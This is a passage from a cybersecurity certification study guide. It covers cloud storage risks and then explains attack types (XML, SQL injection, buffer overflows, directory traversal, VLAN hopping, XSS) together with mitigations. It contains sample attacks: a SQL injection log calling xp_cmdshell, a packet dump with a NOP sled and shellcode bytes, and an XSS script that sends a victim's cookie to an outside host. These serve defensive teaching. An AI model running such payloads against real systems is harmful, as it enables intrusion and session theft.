an algorithm to produce an enhanced key, which should
be at least 128 bits for effectiveness. If key stretching is
used, an attacker would need to either try every possible
combination of the enhanced key or try likely
combinations of the initial key. Key stretching slows
down the attacker because the attacker must compute
the stretching function for every guess in the attack.
Systems that use key stretching include Pretty Good
Privacy (PGP), GNU Privacy Guard (GPG), Wi-Fi
Protected Access (WPA), and WPA2. Widely used
password key-stretching algorithms include PasswordBased Key Derivation Function 2 (PBKDF2), bcrypt, and
scrypt.
UNPROTECTED STORAGE
While cloud storage may seem like a great idea, it
presents many unique issues. Among them are the
following:
• Data breaches: Although cloud providers may
include safeguards in service-level agreements
(SLAs), ultimately the organization is responsible
for protecting its own data, regardless of where it
is located. When this data is not in your hands—
and you may not even know where it is physically
located at any point in time—protecting your data
is difficult.
• Authentication system failures: These
failures allow malicious individuals into the cloud.
This issue sometimes is made worse by the
organization itself when developers embed
credentials and cryptographic keys in source code
and leave them in public-facing repositories.
• Weak interfaces and APIs: Interfaces and
APIs tend to be the most exposed parts of a
system because they’re usually accessible from the
open Internet.
Transfer/Back Up Data to
Uncontrolled Storage
In some cases, users store sensitive data in cloud storage
that is outside the control of the organization, using sites
such as Dropbox. These storage providers have had their
share of data loss issues as well. Policies should address
and forbid this type of storage of data from mobile
devices.
Cloud services give end users more accessibility to their
data. However, this also means that end users can take
advantage of cloud storage to access and share company
data from any location. At that point, the IT team no
longer controls the data. This is the case with both public
and private clouds.
With private clouds, organizations can ensure the
following:
• That the data is stored only on internal resources
• That the data is owned by the organization
• That only authorized individuals are allowed to
access the data
• That data is always available
However, a private cloud is only protected by the
organization’s internal resources, and this protection can
often be affected by the knowledge level of the security
professionals responsible for managing the cloud
security.
With public clouds, organizations can ensure the
following:
• That data is protected by enterprise-class firewalls
and within a secured facility
• That attackers and disgruntled employees are
unsure of where the data actually resides
• That the cloud vendor provides security expertise
and maintains the level of service detailed in the
contract
However, public clouds can grant access to any location,
and data is transmitted over the Internet. Also, the
organization depends on the vendor for all services
provided. End users must be educated about cloud usage
and limitations as part of their security awareness
training. In addition, security policies should clearly
state where data can be stored, and ACLs should be
configured properly to ensure that only authorized
personnel can access data. The policies should also spell
out consequences for storing organizational data in cloud
locations that are not authorized.
Big Data
Big data is a term for sets of data so large or complex
that they cannot be analyzed by using traditional data
processing applications. These data sets are often stored
in the cloud to take advantage of the immense processing
power available there. Specialized applications have been
designed to help organizations with their big data. The
big data challenges that may be encountered include data
analysis, data capture, data search, data sharing, data
storage, and data privacy.
While big data is used to determine the causes of
failures, generate coupons at checkout, recalculate risk
portfolios, and find fraudulent activity before it ever has
a chance to affect the organization, its existence creates
security issues. The first issue is its unstructured nature.
Traditional data warehouses process structured data and
can store large amounts of it, but there is still a
requirement for structure.
Big data typically uses Hadoop, which requires no
structure. Hadoop is an open source framework used for
running applications and storing data. With the Hadoop
Distributed File System, individual servers that are
working in a cluster can fail without aborting the entire
computation process. There are no restrictions on the
data that this system can store. While big data is enticing
because of the advantages it offers, it presents a number
of issues when deployed in the cloud.
• Organizations still do not understand it very well,
and unexpected vulnerabilities can easily be
introduced.
• Open source codes are typically found in big data,
which can result in unrecognized backdoors. It
can contain default credentials.
• Attack surfaces of the nodes may not have been
reviewed, and servers may not have been
hardened sufficiently.
LOGGING AND MONITORING
Without proper auditing, you have no accountability.
You also have no way of knowing what is going on in
your environment. While the next two chapters include
ample discussion of logging and monitoring and its
application, this section briefly addresses the topic with
respect to cloud environments.
Insufficient Logging and Monitoring
Unfortunately, although most technicians agree with and
support the notion that proper auditing is necessary, in
the case of cloud deployments, the logging and
monitoring can leave much to be desired. “Insufficient
Logging and Monitoring” is one of the categories in the
Open Web Application Security Project’s (OWASP) Top
10 list and covers the list of best practices that should be
in place to prevent or limit the damage of security
breaches.
Security professional should work to ensure that cloud
SLAs include access to logging and monitoring tools that
give the organization visibility into the cloud system in
which their data is held.
Inability to Access
One of the issue with utilizing standard logging and
monitoring tools in a cloud environment is the inability
to access the environment in a way that renders visibility
into the environment. In some cases, the vendor will
resist allowing access to its environment. The time to
demand such access is when the SLA is in the process of
being negotiated.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 6-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 6-2 Key Topics in Chapter 6
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Software as a Service (SaaS)
Platform as a Service (PaaS)
Infrastructure as a Service (IaaS)
public cloud
private cloud
community cloud
hybrid cloud
Function as a Service (FaaS)
Infrastructure as Code (IaC)
Data Protection API (DPAPI)
NIST SP 800-57 REV. 5
key escrow
key stretching
big data
REVIEW QUESTIONS
1. With ______________, the vendor provides the
entire solution, including the operating system, the
infrastructure software, and the application?
2. Match the terms on the left with their definitions
on the right.
3. List at least one advantage of IaC.
4. ___ ________________tend to be the most
exposed parts of a cloud system because they’re
usually accessible from the open Internet.
5. APIs are used in the ___________________ so
that devices can speak to each other without users
even knowing the APIs are there.
6. List at least one of the security issues with
serverless computing in the cloud.
7. Match the key state on the left with its definition on
the right.
8. In the _______________ phase of a key, the
keying material is not yet available for normal
cryptographic operations?
9. List at least one security issue with cloud storage.
10. ________________is a term for sets of data so
large or complex that they cannot be analyzed by
using traditional data processing applications
Chapter 7. Implementing
Controls to Mitigate
Attacks and Software
Vulnerabilities
This chapter covers the following topics related
to Objective 1.7 (Given a scenario, implement
controls to mitigate attacks and software
vulnerabilities) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Attack types: Describes XML attacks, SQL
injection, overflow attacks, remote code
execution, directory traversal, privilege escalation,
password spraying, credential stuffing,
impersonation, man-in-the-middle attacks,
session hijacking, rootkit, and cross-site scripting
• Vulnerabilities: Covers improper error
handling, dereferencing, insecure object
reference, race condition, broken authentication,
sensitive data exposure, insecure components,
insufficient logging and monitoring, weak or
default configurations, and use of insecure
functions
When vulnerabilities have been identified and possible
attacks have been anticipated, controls are used to
mitigate or address them. In some cases these controls
can eliminate a vulnerability, but in many cases they can
only lessen the likelihood or the impact of an attack. This
chapter discusses the various types of controls and how
they can be used.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these four self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 7-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 7-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a good solution when
disparate applications that use their own
authorization logic are in use in the enterprise?
a. XML
b. XACML
c. PDP
d. PEP
2. Which of the following attacks can result in reading
sensitive data from the database, modifying
database data, and executing administrative
operations on the database?
a. SQL injection
b. STUXNET
c. Integer overflow
d. TAXII
3. Which of the following has taken place when a
pointer with a value of NULL is used as though it
pointed to a valid memory area?
a. Insecure object reference
b. Improper error handing
c. Dereferencing
d. Advanced persistent threats
4. Which of the following is a type of race condition?
a. Time-of-check/time-of-use
b. NOP sled
c. Dereferencing
d. Overflow
FOUNDATION TOPICS
ATTACK TYPES
In this section we are going to look at the sort of things
that keep network and software security experts up at
night. We’ll look at specific network and software attack
methods that you must understand to be able defend
against them. Then in the following section, we’ll talk
about vulnerabilities, which are characteristics of the
network and software environment in which we operate.
Extensible Markup Language (XML)
Attack
Extensible Markup Language (XML) is the most widely
used web language now and has come under some
criticism. The method currently used to sign data to
verify its authenticity has been described as inadequate
by some critics, and the other criticisms have been
directed at the architecture of XML security in general.
One type of Extensible Markup Language (XML)
attack targets the application that parses or reads and
interprets the XML. If the XML input contains a
reference to an external entity and is processed by a
weakly configured XML parser, it can lead to the
disclosure of confidential data, denial of service, serverside request forgery, and port scanning. This is called an
XML external entity attack and is depicted in Figure 7-1.
Figure 7-1 XML External Entity Attack
To address XML-based attacks, eXtensible Access
Control Markup Language (XACML) has been
developed as a standard for an access control policy
language using XML. Its goal is to create an attributebased access control (ABAC) system that decouples the
access decision from the application or the local
machine. It provides for fine-grained control of activities
based on the following criteria:
• Attributes of the user requesting access (for
example, all division managers in London)
• The protocol over which the request is made (for
example, HTTPS)
• The authentication mechanism (for example,
requester must be authenticated with a certificate)
XACML uses several distributed components, including
• Policy enforcement point (PEP): This entity
protects the resource that the subject (a user or an
application) is attempting to access. When a PEP
receives a request from a subject, it creates an
XACML request based on the attributes of the
subject, the requested action, the resource, and
other information.
• Policy decision point (PDP): This entity
retrieves all applicable polices in XACML and
compares the request with the policies. It
transmits an answer (access or no access) back to
the PEP.
XACML is valuable because it is able to function across
application types. Figure 7-2 illustrates the process flow
used by XACML.
Figure 7-2 XACML
XACML is a good solution when disparate applications
that use their own authorization logic are in use in the
enterprise. By leveraging XACML, developers can
remove authorization logic from an application and
centrally manage access using policies that can be
managed or modified based on business need without
making any additional changes to the applications
themselves.
Structured Query Language (SQL)
Injection
A Structured Query Language (SQL) injection
attack inserts, or “injects,” a SQL query as the input data
from the client to the application. This type of attack can
result in the attacker being able to read sensitive data
from the database, modify database data, execute
administrative operations on the database, recover the
content of a given file, and even issue commands to the
operating system.
Figure 7-3 shows how a regular user might request
information from a database attached to a web server
and also how a hacker might ask for the same
information and get usernames and passwords by
changing the command. While not obvious from the
diagram in Figure 7-3, the attack is prevented by the
security rules in the form of input validation, which
examines all input for malicious characteristics.
Figure 7-3 SQL Injection
The job of identifying SQL injection attacks in logs can
be made easier by using commercial tools such as Log
Parser by Microsoft. This command-line utility, which
uses SQL-like commands, can be used to search and
locate errors of a specific type. One type to look for is a
500 error (internal server error), which often indicates a
SQL injection. Example 7-1 shows an example of a log
entry. In this case, the presence of a CREATE TABLE
statement indicates a SQL injection.
Example 7-1 Log Entry with SQL Injection Attack
GET /inventory/Scripts/ProductList.asp
showdetails=true&idSuper=0&browser=pt%showprods&Type=588
idCategory=60&idProduct=66;CREATE%20TABLE%20[X_6624]
([id]%20int%20
NOT%20NULL%20
IDENTITY%20
(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL;
Insert%20into&20[X_6858] (ResultTxt)
%20exec%20master.dbo.xp_
cmdshell11%20'Dir%20D: \';
Insert%20into&20[X_6858]%20values%20('g_over');
exec%20master.dbo.sp_dropextendedeproc%20'xp_cmdshell'
300
The following measures can help you prevent these types
of attacks:
• Use proper input validation.
• Use blacklisting or whitelisting of special
characters.
• Use parameterized queries in ASP.NET and
prepared statements in Java to perform escaping
of dangerous characters before the SQL statement
is passed to the database.
Overflow Attacks
An overflow occurs when an area of memory of some sort
is full and can hold no more information. Any
information that overflows is lost. Overflowing these
memory areas is one of the ways hackers get systems to
perform operations they aren’t supposed to perform (at
least not at that time or under those circumstances). In
some cases these overflows are caused to permit typically
impermissible actions. There are a number of different
types of overflow attacks. They differ mainly in the
type of memory under attack.
Buffer
A buffer is typically an area of memory that is used to
transfer data from one location to another. In some
cases, a buffer is used to hold data from the disk while
data-manipulating operations are performed. A buffer
overflow is an attack that occurs when the amount of
data that is submitted is larger than the buffer can
handle. Typically, this type of attack is possible because
of poorly written application or operating system code.
This can result in an injection of malicious code,
primarily either a denial-of-service (DoS) attack or a SQL
injection.
To protect against this issue, organizations should ensure
that all operating systems and applications are updated
with the latest updates, service packs, and patches. In
addition, programmers should properly test all
applications to check for overflow conditions.
A hacker can take advantage of this phenomenon by
submitting too much data, which can cause an error or,
in some cases, enable the hacker to execute commands
on the device if the hacker can locate an area where
commands can be executed. Not all attacks are designed
to execute commands. An attack may just lock up the
system, as in a DoS attack.
A packet containing a long string of no-operation (NOP)
instructions followed by a command usually indicates a
type of buffer overflow attack called a NOP slide. The
purpose of this type of attack is to get the CPU to locate
where a command can be executed. Example 7-2 shows a
packet containing a long string of NOP instructions, as
seen by a sniffer.
Example 7-2 Packet with NOP Slide, As Seen by a
Sniffer
TCP Connection Request
---- 14/03/2019 15:40:57.910
68.144.193.124 : 4560 TCP Connected ID =
---- 14/03/2014 15:40:57.910
Status Code: 0 OK
68.144.193.124 : 4560 TCP Data In Length
bytes
MD5 = 19323C2EA6F5FCEE2382690100455C17
---- 14/03/2004 15:40:57.920
0000 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0010 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0020 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0030 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0040 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0050 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0060 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0070 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0080 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
0090 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
00A0 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
00B0 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
00C0 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
00D0 90 90 90 90 90 90 90 90 90 90 90 90
90 90 ................
00E0 90 90 90 90 90 90 90 90 90 90 90 90
1
697
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90
90 90 ................
00F0 90 90 90 90 90 90
90 90 ................
0100 90 90 90 90 90 90
E3 77 ............M?.w
0110 90 90 90 90 FF 63
90 90 .....cd.........
0120 90 90 90 90 90 90
90 90 ................
0130 90 90 90 90 90 90
66 B9 ..........ZJ3.f.
0140 66 01 80 34 0A 99
FF 70 f..4...........p
0150 99 98 99 99 C3 21
85 34 .....!.id......4
0160 12 D9 91 12 41 12
6A 12 ....A....j....j.
0170 E7 B9 9A 62 12 D7
9A 62 ...b....t......b
0180 12 6B F3 97 C0 6A
DC 7B .k...j?.....^..{
0190 70 C0 C6 C7 12 54
58 AA p....T....ZHx.X.
01A0 50 FF 12 91 12 DF
12 99 P.......ZXx..X..
01B0 9A 5A 12 63 12 6E
71 E5 .Z.c.n._..I...q.
01C0 99 99 99 1A 5F 94
F3 9D ...._...f.e..A..
01D0 C0 71 F0 99 99 99
66 CE .q............f.
01E0 69 12 41 5E 9E 9B
F3 89 i.A^....$.Y.....
01F0 CE CA 66 CE 6D F3
66 CE ..f.m...f.a...f.
0200 65 1A 75 DD 12 6D
7B 62 e.u..m.B......{b
0210 10 DF A1 10 DF A5
99 99 .........^......
0220 14 DE 89 C9 CF CA
A5 FA ............^...
0230 F4 FD 99 14 DE A5
71 AA ........f.}.f.q.
0240 59 35 1C 59 EC 60
32 7B Y5.Y.`....fK..2{
0250 77 AA 59 5A 71 62
F6 FA w.YZqbgff.......
0260 D8 FD FD EB FC EA
C9 EB ................
0270 F6 FA FC EA EA D8
FA FC ................
0280 EA EA 99 D5 F6 F8
D8 99 ................
0290 EE EA AB C6 AA AB
90 90 90 90 90 90 90 90
90 90 90 90 90 90 4D 3F
64 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 EB 10 5A 4A 33 C9
E2 FA EB 05 E8 EB FF FF
95 69 64 E6 12 99 12 E9
EA A5 9A 6A 12 EF E1 9A
8D AA 74 CF CE C8 12 A6
3F ED 91 C0 C6 1A 5E 9D
12 DF BD 9A 5A 48 78 9A
85 9A 5A 58 78 9B 9A 58
1A 5F 97 12 49 F3 9A C0
CB CF 66 CE 65 C3 12 41
C9 C9 C9 C9 F3 98 F3 9B
99 9E 24 AA 59 10 DE 9D
98 CA 66 CE 61 C9 C9 CA
AA 42 F3 89 C0 10 85 17
10 DF D9 5E DF B5 98 98
CA CA F3 98 CA CA 5E DE
C9 CA 66 CE 7D C9 66 CE
C8 CB CF CA 66 4B C3 C0
67 66 66 DE FC ED C9 EB
EA 99 DA EB FC F8 ED FC
99 DC E1 F0 ED C9 EB F6
FD D5 F0 FB EB F8 EB E0
99 CE CA D8 CA F6 FA F2
FC ED ................
02A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99
F8 FA ................
Notice the long string of 90s in the middle of the packet;
this string pads the packet and causes it to overrun the
buffer. Example 7-3 shows another buffer overflow
attack.
Example 7-3 Buffer Overflow Attack
#include
char *code = "AAAABBBBCCCCDDD"; //including
the character '\0' size =
16 bytes
void main()
{char buf[8];
strcpy(buf,code);
In this example, 16 characters are being sent to a buffer
that holds only 8 bytes. With proper input validation, a
buffer overflow attack causes an access violation.
Without proper input validation, the allocated space is
exceeded, and the data at the bottom of the memory
stack is overwritten. The key to preventing many buffer
overflow attacks is input validation, in which any input is
checked for format and length before it is used. Buffer
overflows and boundary errors (when input exceeds the
boundaries allotted for the input) are a family of error
conditions called input validation errors.
Integer Overflow
Integer overflow occurs when math operations try to
create a numeric value that is too large for the available
space. The register width of a processor determines the
range of values that can be represented. Moreover, a
program may assume that a variable always contains a
positive value. If the variable has a signed integer type,
an overflow can cause its value to wrap and become
negative. This may lead to unintended behavior.
Similarly, subtracting from a small unsigned value may
cause it to wrap to a large positive value, which may also
be an unexpected behavior.
You can mitigate integer overflow attacks by doing the
following:
• Use strict input validation.
• Use a language or compiler that performs
automatic bounds checks.
• Choose an integer type that contains all possible
values of a calculation. This reduces the need for
integer type casting (changing an entity of one
data type into another), which is a major source of
defects.
Heap
A heap is an area of memory that can be increased or
decreased in size. This area of memory sits between the
memory-mapped region for shared libraries and the
runtime heap. The area of memory is used for dynamic
memory allocation. Overflows that occur in this area are
called heap overflows. An example of an overflow into
the heap area is shown in Figure 7-4.
Figure 7-4 Heap Overflow
Remote Code Execution
Remote code execution attacks comprise a category
of attack types distinguished by the ability of the hacker
to get the local system (user system) to execute code that
resides on another machine, which could be located
anywhere in the world. In some cases the remote code
has been embedded in a website the user visits. In other
cases the code may be injected into the user’s browser.
The key element is that the code came from the hacker
and is executed or injected from a remote location. A
specific form of this attack is shown in Figure 7-5, in
which the target is the local DNS server.
Figure 7-5 Remote Code Execution
Directory Traversal
Like any other server, web servers have a folder
structure. When users access web pages, the content is
found in parts of the structure that are the only parts
designed to be accessible by a web user. One of the ways
malicious individuals are able to access parts of the
directory to which they should not have access is through
a process called directory traversal. If they are able
to break out of the web root folder, they can access
restricted directories and execute commands outside of
the web server’s root directory.
In Figure 7-6, the hacker has been able to access a
subfolder of the root, System32. This is where the
password files are found as you can see. This, if allowed
by the system, is done by using the ../ technique to back
up from the root to the System32 folder.
Figure 7-6 Directory Traversal
Preventing directory traversal is accomplished by
filtering the user’s input and removing metacharacters.
Privilege Escalation
Privilege escalation is the process of exploiting a bug
or weakness in an operating system to allow a user to
receive privileges to which she is not entitled. These
privileges can be used to delete files, view private
information, or install unwanted programs, such as
viruses. There are two types of privilege escalation:
• Vertical privilege escalation: This occurs
when a lower-privilege user or application
accesses functions or content reserved for higherprivilege users or applications.
• Horizontal privilege escalation: This occurs
when a normal user accesses functions or content
reserved for other normal users.
The following measures can help prevent privilege
escalation:
• Ensure that databases and related systems and
applications are operating with the minimum
privileges necessary to function.
• Verify that users are given the minimum access
required to do their job.
• Ensure that databases do not run with root,
administrator, or other privileged account
permissions, if possible.
Password Spraying
Password spraying is a technique used to identify the
passwords of domain users. Rather than targeting a
single account as in a brute-force attack, password
spraying targets, or “sprays,” multiple accounts with the
same password attempt. Because account lockouts are
based on attempts per account, this technique enables
the attacker to attempt a password against many
accounts at once without locking out any of the accounts.
When performed in a controlled manner (meaning to
remain conscious of the time period since the last
attempt against an account and waiting until the timer
starts over before another attempt), an attacker can
basically perform a brute-force attack without locking
out accounts. Figure 7-7 shows the process.
Figure 7-7 Password Spraying
Credential Stuffing
Another form of brute-force attack is credential
stuffing. In this case, the malicious individuals have
obtained a password file and need to match the
passwords with the proper accounts. Large numbers of
captured ( spilled) credentials are automatically entered
into websites until they are potentially matched to an
existing account, which the attackers can then hijack for
their own purposes. This process is usually automated in
some way, as shown in Figure 7-8.
Figure 7-8 Credential Stuffing
To prevent credential stuffing:
• Implement multifactor authentication.
• Regularly check compromised accounts lists and
require password resets for any users who appear
on a list.
• Require periodic password resets for all users.
• Enable CAPTCHAs (challenge–response test to
determine whether or not the user is human).
Impersonation
Impersonation occurs when one user assumes the
identity of another by acquiring the logon credentials
associated with the account. This typically occurs
through exposure of the credentials either through social
engineering (shoulder surfing, help desk intimidation,
etc.) or by sniffing unencrypted credentials in transit.
The best approach to preventing impersonation is user
education, because many of these attacks rely on the user
committing some insecure activity.
Man-in-the-Middle Attack
A man-in-the-middle attack intercepts legitimate
traffic between two entities. The attacker can then
control information flow and eliminate or alter the
communication between the two parties. Types of manin-the-middle attacks include
• ARP spoofing: The attacker poisons the ARP
cache on a switch by answering ARP requests for
another computer’s IP address with his own MAC
address. After the ARP cache has been
successfully poisoned, when ARP resolution
occurs, both computers have the attacker’s MAC
address listed as the MAC address that maps to
the other computer’s IP address. As a result, both
are sending to the attacker, placing him “in the
middle.” Two mitigation techniques are available
for preventing ARP poisoning on a Cisco switch:
• Dynamic ARP Inspection (DAI): This
security feature intercepts all ARP requests and
responses and compares each response’s MAC
address and IP address information against the
MAC–IP bindings contained in a trusted
binding table. This table is built by also
monitoring all DHCP requests for IP addresses
and maintaining the mapping of each resulting
IP address to a MAC address (which is a part of
DHCP snooping). If an incorrect mapping is
attempted, the switch rejects the packet.
• DHCP snooping: The main purpose of
DHCP snooping is to prevent a poisoning
attack on the DHCP database. This is not a
switch attack per se, but one of its features can
support DAI. It creates a mapping of IP
addresses to MAC addresses from a trusted
DHCP server that can be used in the validation
process of DAI.
You must implement both DAI and DHCP snooping
because DAI depends on DHCP snooping.
• MAC overflow: Preventing security issues with
switches involves preventing MAC address
overflow attacks. By design, switches place each
port in its own collision domain, which is why a
sniffer connected to a single port on a switch can
only capture the traffic on that port and not traffic
on other ports. However, an attack called a MAC
address overflow attack can cause a switch to fill
its MAC address table with nonexistent MAC
addresses. Using free tools, a hacker can send
thousands of nonexistent MAC addresses to the
switch. The switch can dedicate only a certain
amount of memory for the table, and at some
point, it fills with the bogus MAC addresses. This
prevents valid devices from creating contentaddressable memory (CAM) entries (MAC
addresses) in the MAC address table. When this
occurs, all legitimate traffic received by the switch
is flooded out every port. Remember that this is
what switches do when they don’t find a MAC
address in the table. A hacker can capture all the
traffic. Figure 7-9 shows how this type of attack
works.
Figure 7-9 MAC Overflow Attack
VLAN-based Attacks
Enterprise-level switches are capable of creating virtual
local-area networks (VLANs). These are logical
subdivisions of a switch that segregate ports from one
another as if they were in different LANs. VLANs can
also span multiple switches, meaning that devices
connected to switches in different parts of a network can
be placed in the same VLAN, regardless of physical
location. A VLAN adds a layer of separation between
sensitive devices and the rest of the network. For
example, if only two devices should be able to connect to
the HR server, the two devices and the HR server could
be placed in a VLAN separate from the other VLANs.
Traffic between VLANs can occur only through a router.
Routers can be used to implement access control lists
(ACLs) that control the traffic allowed between VLANs.
Table 7-2 lists the advantages and disadvantages of
deploying VLANs.
Table 7-2 Advantages and Disadvantages of VLANs
As you can see, the benefits of deploying VLANs far
outweigh the disadvantages, but there are some VLAN
attacks of which you should be aware. In particular, you
need to watch out for VLAN hopping. By default, a
switch port is an access port, which means it can only be
a member of a single VLAN. Ports that are configured to
carry the traffic of multiple VLANs, called trunk ports,
are used to carry traffic between switches and to routers.
An aim of a VLAN hopping attack is to receive traffic
from a VLAN of which the hacker’s port is not a member.
It can be done two ways:
• Switch spoofing: Switch ports can be set to use
a negotiation protocol called Dynamic Trunking
Protocol (DTP) to negotiate the formation of a
trunk link. If an access port is left configured to
use DTP, it is possible for a hacker to set his
interface to spoof a switch and use DTP to create a
trunk link. If this occurs, the hacker can capture
traffic from all VLANs. Figure 7-10 shows this
process. To prevent this, you should disable DTP
on all switch ports.
Figure 7-10 Switch Spoofing
A switch port can be configured with the following
possible settings:
• Trunk (hard-coded to be a trunk)
• Access (hard-coded to be an access port)
• Dynamic desirable (in which case the port is
willing to form a trunk and actively attempts to
form a trunk)
• Dynamic auto (in which case the port is willing
to form a trunk but does not initiate the
process)
If a switch port is set to either dynamic desirable or
dynamic auto, it would be easy for a hacker to connect a
switch to that port, set his port to dynamic desirable, and
thereby form a trunk. All switch ports should be hardcoded to trunk or access, and DTP should not be used.
You can use the following command set to hard-code a
port on a Cisco router as a trunk port:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode trunk
To hard-code a port as an access port that will never
become a trunk port, thus making it impervious to a
switch spoofing attack, you use this command set:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode access
• Double tagging: Tags are used on trunk links to
identify the VLAN to which each frame belongs.
Another type of attack to trunk ports is called
VLAN hopping. It can be accomplished using a
process called double tagging. In this attack, the
hacker creates a packet with two tags. The first tag
is stripped off by the trunk port of the first switch
it encounters, but the second tag remains,
allowing the frame to hop to another VLAN. This
process is shown in Figure 7-11. In this example,
the native VLAN number between the Company
Switch A and Company Switch B switches has
been changed from the default of 1 to 10.
Figure 7-11 Double Tagging
To prevent this, you do the following:
• Specify the native VLAN (the default VLAN, or
VLAN 1) as an unused VLAN ID for all trunk
ports by specifying a different VLAN number
for the native VLAN. Make sure it matches on
both ends of each link. To change the native
VLAN from 1 to 99, execute this command on
the trunk interface:
switch(config-if)# switchport trunk native
vlan 99
• Move all access ports out of VLAN 1. You can
do this by using the interface range command
for every port on a 12-port switch as follows:
switch(config)# interface-range FastEthernet
0/1 – 12
switch(config-if)# switchport access vlan 61
This example places the access ports in
VLAN 61.
• Place unused ports in an unused VLAN. Use
the same command you used to place all ports
in a new native VLAN and specify the VLAN
number.
Session Hijacking
In a session hijacking attack, the hacker attempts to
place himself in the middle of an active conversation
between two computers for the purpose of taking over
the session of one of the two computers, thus receiving
all data sent to that computer. A couple of tools can be
used for this attack. Juggernaut and the Hunt Project
allow the attacker to spy on the TCP session between the
computers. Then the attacker uses some sort of DoS
attack to remove one of the two computers from the
network while spoofing the IP address of that computer
and replacing that computer in the conversation. This
results in the hacker receiving all traffic that was
originally intended for the computer that suffered the
DoS attack. Figure 7-12 shows a session highjack.
Figure 7-12 Session Hijacking
Rootkit
A rootkit is a set of tools that a hacker can use on a
computer after he has managed to gain access and
elevate his privileges to administrator. It gets its name
from the root account, the most powerful account in
Linux-based operating systems. Rootkit tools might
include a backdoor for the hacker to access. This is one of
the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely
remove it.
The following are some of the actions a rootkit can take:
• Installing a backdoor
• Removing all entries from the security log (log
scrubbing)
• Replacing default tools with a compromised
version (Trojaned programs)
• Making malicious kernel changes
Unfortunately, the best defense against rootkits is to not
to get them in the first place because they are very
difficult to detect and remove. In many cases rootkit
removal renders the system useless. There are some
steps you can take to prevent rootkits, including the
following:
• Monitor system memory for ingress points for a
process as it invokes and keeps track of any
imported library calls that may be redirected to
other functions.
• Use the Microsoft Safety Scanner to look for
information kept hidden from the Windows API,
the Master File Table, and the directory index.
• Consider products that are standalone rootkit
detection tools, such as Microsoft Safety Scanner
and Malwarebytes Anti-Rootkit 2019.
• Keep the firewall updated.
• Harden all workstations.
Cross-Site Scripting
Cross-site scripting (XSS) occurs when an attacker
locates a website vulnerability and injects malicious code
into the web application. Many websites allow and even
incorporate user input into a web page to customize the
web page. If a web application does not properly validate
this input, one of two things could happen: the text may
be rendered on the page, or a script may be executed
when others visit the web page. Figure 7-13 shows a
high-level view of an XSS attack.
Figure 7-13 High-Level View of a Typical XSS
Attack
The following example of an XSS attack is designed to
steal a cookie from an authenticated user:
<SCRIPT>
document.location='http://site.comptia/cgibin/script.cgi?'+document. cookie </SCRIPT>
Proper validation of all input should be performed to
prevent this type of attack. This involves identifying all
user-supplied input and testing all output.
There are three types of XSS attacks:
• Reflected XSS
• Persistent XSS
• Document Object Model (DOM) XSS
Let’s look at how they differ.
Reflected
In a reflected XSS attack (also called a non-persistent
or Type II attack), a web application immediately returns
user input in an error message or search result without
that data being made safe to render in the browser, and
without permanently storing the user-provided data.
Figure 7-14 shows an example of how a reflected XSS
attack works.
Figure 7-14 Reflected XSS Attack
Persistent
A persistent XSS attack (also called a stored or Type I
attack) stores the user input on the target server, such as
in a database, a message forum, a visitor log, a comment
field, and so forth. And then a victim is able to retrieve
the stored data from the web application without that
data being made safe to render in the browser. Figure 715 shows an example of a persistent XSS attack.
Figure 7-15 Persistent XSS Attack
Document Object Model (DOM)
With a Document Object Model (DOM) XSS attack
(or Type 0 attack), the entire tainted data flow from
source to sink (a class or function designed to receive
incoming events from another object or function) takes
place in the browser. The source of the data is in the
DOM, the sink is also in the DOM, and the data flow
never leaves the browser. Figure 7-16 shows an example
of this approach.
Figure 7-16 DOM-Based XSS Attack
VULNERABILITIES
Whereas attacks are actions carried out by malicious
individuals, vulnerabilities are characteristics of the
network and software environment in which we operate.
This section describes the various software
vulnerabilities that a cybersecurity analyst should be able
to identify and remediate.
Improper Error Handling
Web applications, like all other applications, suffer from
errors and exceptions, and such problems are to be
expected. However, the manner in which an application
reacts to errors and exceptions determines whether
security can be compromised. One of the issues is that an
error message may reveal information about the system
that a hacker may find useful. For this reason, when
applications are developed, all error messages describing
problems should be kept as generic as possible. Also, you
can use tools such as the OWASP Zed Attack Proxy (ZAP,
introduced in Chapter 4) to try to make applications
generate errors.
Dereferencing
A null-pointer dereference takes place when a pointer
with a value of NULL is used as though it pointed to a
valid memory area. In the following code, the
assumption is that “cmd” has been defined:
String cmd = System.getProperty("cmd");
= cmd.trim();
cmd
If it has not been defined, the program throws a nullpointer exception when it attempts to call the trim()
method. If an attacker can intentionally trigger a nullpointer dereference, the attacker might be able to use the
